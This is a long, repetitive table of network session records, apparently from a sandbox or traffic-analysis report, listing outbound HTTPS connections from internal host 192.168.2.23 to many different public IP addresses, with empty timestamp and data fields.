                                          18859192.168.2.2337356129.12.42.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18860192.168.2.2343262119.30.167.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18861192.168.2.234811827.137.18.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18862192.168.2.2341186182.43.85.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18863192.168.2.2348494110.196.190.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18864192.168.2.2344178122.119.101.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18865192.168.2.2336998184.47.114.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18866192.168.2.234110258.72.41.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18867192.168.2.2356098216.141.90.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18868192.168.2.233706234.39.36.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18869192.168.2.2342938210.36.96.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18870192.168.2.235983225.147.134.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18871192.168.2.2345118194.197.199.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18872192.168.2.233410638.216.106.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18873192.168.2.234279237.232.198.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18874192.168.2.233278489.103.210.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18875192.168.2.233689861.48.205.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18876192.168.2.2355954208.125.203.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18877192.168.2.235698644.25.62.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18878192.168.2.2345248204.61.7.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18879192.168.2.2360542197.197.122.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18880192.168.2.233650051.211.165.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18881192.168.2.234220060.117.76.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18882192.168.2.233727471.252.160.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18883192.168.2.2333324163.109.213.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18884192.168.2.233537017.86.166.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18885192.168.2.2340272210.91.16.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18886192.168.2.2345386179.201.214.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18887192.168.2.2352400143.33.140.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18888192.168.2.2360918112.126.142.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18889192.168.2.234930087.99.178.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18890192.168.2.2339606206.242.162.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18891192.168.2.2345570149.59.142.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18892192.168.2.2356376189.122.159.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18893192.168.2.2333056108.101.46.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18894192.168.2.2338302114.207.84.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18895192.168.2.2343060143.29.171.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18896192.168.2.2339194157.139.93.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18897192.168.2.233371636.133.216.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18898192.168.2.2360064183.60.185.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18899192.168.2.2355746197.34.132.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18900192.168.2.2358584194.109.204.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18901192.168.2.233531437.220.120.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18902192.168.2.233884884.23.127.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18903192.168.2.2352858216.124.144.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18904192.168.2.2350976147.1.182.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18905192.168.2.2343872187.65.169.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18906192.168.2.2355524209.143.237.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18907192.168.2.2356196148.172.250.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18908192.168.2.2354974139.131.74.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18909192.168.2.2336820120.61.214.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18910192.168.2.236092888.174.74.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18911192.168.2.234645072.240.212.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18912192.168.2.2340818196.65.131.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18913192.168.2.23377145.91.94.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18914192.168.2.235376299.17.144.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18915192.168.2.234469252.155.229.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18916192.168.2.233595842.234.172.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18917192.168.2.233625274.33.17.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18918192.168.2.234855494.236.154.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18919192.168.2.23425144.83.38.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18920192.168.2.2337474111.145.241.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18921192.168.2.2335288216.81.157.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18922192.168.2.2345150105.241.81.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18923192.168.2.2349976151.177.203.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18924192.168.2.233806866.39.25.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18925192.168.2.2357778130.191.199.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18926192.168.2.2334834113.117.174.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18927192.168.2.233598290.159.48.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18928192.168.2.2357364207.194.108.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18929192.168.2.2343286169.111.18.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18930192.168.2.2347426221.133.166.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18931192.168.2.235135460.19.201.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18932192.168.2.235477642.189.181.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18933192.168.2.2337752158.226.94.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18934192.168.2.235961814.103.167.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18935192.168.2.235502240.247.15.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18936192.168.2.2357186102.252.90.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18937192.168.2.2347130167.32.207.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18938192.168.2.235556040.196.80.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18939192.168.2.2355570115.195.144.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18940192.168.2.2345798165.97.80.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18941192.168.2.233696624.37.229.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18942192.168.2.2354762125.35.8.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18943192.168.2.2343046137.103.156.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18944192.168.2.234623047.144.234.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18945192.168.2.2344848138.56.235.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18946192.168.2.2333742185.42.195.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18947192.168.2.2333742108.116.94.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18948192.168.2.234779025.181.111.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18949192.168.2.2349448110.230.13.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18950192.168.2.2347156199.45.107.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18951192.168.2.2351830117.147.250.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18952192.168.2.235301096.210.148.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18953192.168.2.2343998111.247.17.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18954192.168.2.2352430210.161.18.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18955192.168.2.23530762.132.253.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18956192.168.2.235286660.45.207.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18957192.168.2.234642862.106.238.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18958192.168.2.234746099.28.186.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18959192.168.2.2346464137.238.59.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18960192.168.2.235416824.251.109.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18961192.168.2.235765079.85.88.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18962192.168.2.233759887.11.206.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18963192.168.2.2355314113.213.40.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18964192.168.2.2338816123.51.94.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18965192.168.2.2358560172.59.254.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18966192.168.2.2355236155.18.179.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18967192.168.2.2349378223.33.45.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18968192.168.2.233503012.214.75.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18969192.168.2.234200069.200.248.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18970192.168.2.2355650133.192.86.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18971192.168.2.2334698193.241.241.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18972192.168.2.2335690111.83.113.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18973192.168.2.235137890.162.167.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18974192.168.2.236015448.56.137.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18975192.168.2.2358060167.167.14.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18976192.168.2.234102868.232.187.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18977192.168.2.234571218.22.204.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18978192.168.2.2354020202.192.157.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18979192.168.2.233401418.60.243.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18980192.168.2.2337696170.134.34.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18981192.168.2.2349142216.161.163.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18982192.168.2.233809271.94.88.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18983192.168.2.233958276.88.237.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18984192.168.2.2353356176.127.196.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18985192.168.2.2339906149.130.47.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18986192.168.2.2358304202.181.206.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18987192.168.2.233982675.152.81.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18988192.168.2.234397680.34.36.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18989192.168.2.2338330161.95.170.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18990192.168.2.2340108118.186.18.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18991192.168.2.234966281.209.145.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18992192.168.2.2358228109.108.48.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18993192.168.2.2335872184.67.57.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18994192.168.2.233946469.25.97.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18995192.168.2.235006447.159.18.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18996192.168.2.235121019.109.215.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18997192.168.2.233555025.72.65.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18998192.168.2.2355990213.215.159.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          18999192.168.2.234097052.154.212.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19000192.168.2.2338518156.103.9.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19001192.168.2.233312850.231.9.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19002192.168.2.234882439.33.41.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19003192.168.2.235121690.116.254.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19004192.168.2.2334860137.184.247.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19005192.168.2.2339868123.46.69.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19006192.168.2.2346286138.114.193.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19007192.168.2.234022661.13.8.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19008192.168.2.2356766143.79.77.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19009192.168.2.2346992146.244.137.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19010192.168.2.233494498.182.119.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19011192.168.2.2340294129.1.192.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19012192.168.2.2333870179.90.27.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19013192.168.2.236014094.245.148.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19014192.168.2.2344910176.185.63.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19015192.168.2.2353104176.148.148.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19016192.168.2.234498463.52.70.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19017192.168.2.235879245.145.107.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19018192.168.2.235882640.132.55.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19019192.168.2.2352386106.106.15.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19020192.168.2.2338868170.220.179.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19021192.168.2.2351618175.82.43.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19022192.168.2.2336916108.114.170.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19023192.168.2.2346630117.222.213.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19024192.168.2.235793870.211.122.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19025192.168.2.23343644.154.34.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19026192.168.2.23498762.192.149.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19027192.168.2.2345660187.250.33.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19028192.168.2.235728649.97.12.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19029192.168.2.2352854182.39.171.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19030192.168.2.233692287.145.61.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19031192.168.2.2354084100.236.81.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19032192.168.2.2352636157.48.179.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19033192.168.2.235315852.221.191.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19034192.168.2.233490084.243.153.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19035192.168.2.2336742143.171.114.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19036192.168.2.233752849.175.168.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19037192.168.2.2357818170.252.239.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19038192.168.2.2340064186.49.29.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19039192.168.2.234884465.160.169.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19040192.168.2.2345598223.45.255.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19041192.168.2.235647644.182.49.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19042192.168.2.2349036107.6.153.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19043192.168.2.2338506155.104.165.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19044192.168.2.2333762167.143.221.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19045192.168.2.23346989.198.127.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19046192.168.2.2348774219.167.92.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19047192.168.2.235375686.166.72.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19048192.168.2.234879658.109.128.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19049192.168.2.2353362206.246.58.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19050192.168.2.2343502105.24.29.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19051192.168.2.2336762206.235.66.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19052192.168.2.2351602115.226.49.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19053192.168.2.2352978206.97.78.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19054192.168.2.2343192113.27.13.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19055192.168.2.235901440.46.227.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19056192.168.2.2343870197.34.74.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19057192.168.2.2356798182.50.246.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19058192.168.2.234385892.118.140.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19059192.168.2.2356258167.109.115.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19060192.168.2.234307836.208.204.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19061192.168.2.233518614.95.110.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19062192.168.2.2345476145.243.142.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19063192.168.2.235404275.173.218.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19064192.168.2.2350370180.48.238.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19065192.168.2.2337708155.235.61.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19066192.168.2.2350572168.143.223.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19067192.168.2.2348766211.221.31.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19068192.168.2.234180053.117.63.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19069192.168.2.234791632.245.113.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19070192.168.2.2354392204.222.113.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19071192.168.2.235270059.39.73.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19072192.168.2.233300858.178.242.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19073192.168.2.2343066111.97.233.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19074192.168.2.2360780195.56.75.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19075192.168.2.2358928190.35.11.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19076192.168.2.2357124173.143.86.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19077192.168.2.2354218219.130.46.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19078192.168.2.2348830222.183.240.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19079192.168.2.2336552223.27.79.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          19080192.168.2.235512423.44.233.212443
                                          TimestampBytes transferredDirectionData


